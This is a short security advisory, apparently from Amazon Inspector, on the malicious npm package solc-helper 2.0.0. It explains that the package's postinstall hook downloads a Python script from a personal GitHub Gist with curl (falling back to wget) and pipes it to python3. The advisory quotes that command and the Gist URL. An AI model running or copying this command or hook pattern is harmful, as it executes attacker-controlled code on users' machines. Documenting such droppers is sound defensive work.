npmjs_solc-helper @2.0.0

Summary

The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3 , with a wget fallback to the same Gist. On npm install , the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account ( guellemilb ) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.

Source: amazon-inspector (b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71)